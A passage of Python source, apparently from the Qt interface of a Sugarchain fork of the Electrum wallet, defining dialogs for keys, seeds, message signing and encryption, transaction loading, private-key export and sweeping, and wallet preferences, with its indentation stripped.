grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("sugarchain:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-sugar-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 SUGAR = 1000 mSUGAR. 1 mSUGAR = 1000 uSUGAR. 1 uSUGAR = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
